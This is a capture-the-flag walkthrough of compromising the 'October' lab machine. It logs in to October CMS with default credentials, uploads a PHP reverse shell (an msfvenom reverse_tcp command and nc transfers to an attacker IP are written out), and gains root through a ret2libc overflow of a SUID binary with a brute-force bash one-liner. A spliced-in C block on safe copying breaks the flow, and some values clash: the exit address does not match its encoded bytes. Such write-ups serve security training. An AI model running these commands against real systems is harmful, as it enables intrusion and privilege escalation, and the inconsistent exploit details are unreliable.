IP:10.10.10.16
OS:Linux
Enumeration:
October is a tough machine as it involves a buffer overflow. If you are a sadist, you will enjoy getting root.
We start off with nmap enumeration, which shows two ports open: 80 and 22. Plugging the remote machine's IP into our browser, we find that it is running October CMS.
Running gobuster against port 80 to brute-force directories, we find an interesting one called /backend, which redirects us to a default login page.
Exploitation:
You can log in to this CMS with the default credentials "Username: admin Password: admin", which gives us admin access.
Next we can either use a msfvenom PHP payload (msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw > shell.php5) with a Metasploit listener (multi/handler) to get a shell, OR set up a nc listener and upload a PHP shell under the Media/Upload tabs. A PHP reverse shell is available on Kali (locate php-reverse-shell); rename it with a .php5 extension, as that is what October executes. I chose to do the latter.
Once I upload the reverse shell, I click on it and get a limited shell as the www-data user.
Next I spawn a tty shell and look for files running as root and binaries with the SUID bit set.
We find an interesting binary, ovrflw, that has the SUID bit set (root SUID permission). The file ovrflw is an ELF executable and we can get root access by exploiting it.
The link provided will teach you more about SUID and SGID permissions: https://www.linuxnix.com/sgid-set-sgid-linuxunix/
I then transfer the binary from the remote shell to my Kali machine using the commands:
On the remote machine: nc -w 5 10.10.14.20 999 < /usr/local/bin/ovrflw
On Kali: nc -l -p 999 > ovrflw
I make the binary executable (chmod +x) and then open it in gdb to look at the assembly code. At main+64 we find the call to strcpy. strcpy performs no bounds check, so it is vulnerable to a buffer overflow, and that is what we will be exploiting. The strings command against the binary also shows the same.
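As an added illustration of the defect found at main+64 (this is example code written for this write-up, not the ovrflw binary's source, and BUF_SIZE is a constructed size since the real buffer length is not given here), the unbounded strcpy pattern is shown next to a bounded replacement that rejects input which does not fit:

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64 /* constructed size for this example; the real ovrflw buffer size is not stated */

/* The pattern seen in the write-up: argv[1] is copied into a fixed stack
 * buffer with no length check. Anything longer than BUF_SIZE (including the
 * terminating NUL) runs past the buffer into the saved frame, which is why a
 * SIGSEGV with EIP overwritten shows up in gdb. Only ever call this with
 * input you know fits; it is kept here to show the defect, not to run it. */
void vulnerable_copy(const char *src)
{
    char buf[BUF_SIZE];
    strcpy(buf, src); /* no bounds check */
    printf("%s\n", buf);
}

/* Hardened replacement: measure first, refuse anything that does not fit
 * together with its NUL terminator, and only then copy. Returns 0 on
 * success and -1 when the input is rejected. */
int safe_copy(const char *src)
{
    char buf[BUF_SIZE];
    size_t len = strlen(src);
    if (len >= BUF_SIZE) {
        return -1; /* would overflow: reject instead of copying */
    }
    memcpy(buf, src, len + 1);
    printf("%s\n", buf);
    return 0;
}

/* Helper for reasoning about the defect: does input of this length overflow
 * the buffer in vulnerable_copy? (len + 1 bytes are written, so len == BUF_SIZE
 * already overflows by one.) */
int would_overflow(size_t len)
{
    return len >= BUF_SIZE;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (safe_copy(argv[1]) != 0) {
        fprintf(stderr, "input rejected: %zu bytes does not fit a %d-byte buffer\n",
                strlen(argv[1]), BUF_SIZE);
        return 2;
    }
    return 0;
}
```

Compile with `gcc -Wall -o copydemo copydemo.c` and run it with a short and then a long argument; the bounded version exits with status 2 on the long one instead of crashing. In a setuid binary the difference matters even more: a crash on bad input is the best case, and the write-up below shows the worst case.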
First we set a breakpoint with the b main command and run the program. The program stops at the breakpoint at 0x08048480.
Second we check which protections are enabled and see that the NX (non-executable) bit is enabled, meaning we cannot place our shellcode on the stack and execute it. We disable ASLR on our local machine with the command: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Next we create a pattern to find the EIP offset. You can use Kali's Metasploit pattern_create.rb with a length of 200 (-l 150) or use gdb with PEDA installed (pattern_create 200).
Restart the program and run it with the pattern as its argument. Once the program reaches its breakpoint, press c to continue and you should see a SIGSEGV with EIP overwritten, "0x64413764" in our case.
We then take that value and pass it to gdb's pattern_offset (or in Kali: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x64413764) and get an offset of 112. So we need to write 112 characters and then write the address of the instructions we want executed.
Next we try to insert shellcode into the buffer, but we are unable to execute it because DEP is enabled, which prevents code on the stack from being executed. Instead we do a ret2libc attack, calling a function (system) that is already present in the process's mapped libc. ASLR is also enabled on the target, so we have no choice but to brute-force the address. We just have to find the addresses of system, exit and the string "/bin/sh", as below:
gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb7596310, +9999999, "/bin/sh"
(gdb) x/s 0xb76b8bac
(gdb) p exit
System = 0xb7596310
Exit = 0xb7702f34
/bin/sh = 0xb76b8bac
little endian format = "\x10\x63\x59\xb7\x60\x92\x58\xb7\xac\xb8\x6b\xb7"
We then create our exploit ("while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 + "\x10\x63\x59\xb7\x60\x92\x58\xb7\xac\xb8\x6b\xb7"'); done") and brute-force the address in a bash loop because of ASLR. We order the addresses as system > exit > /bin/sh. We get the root shell as soon as the libc base matches our memory address!!
To get root, we can also modify our buf.py code and fill in the parameters from the remote shell as shown in the picture below, copy it to the /tmp folder and run it to get root.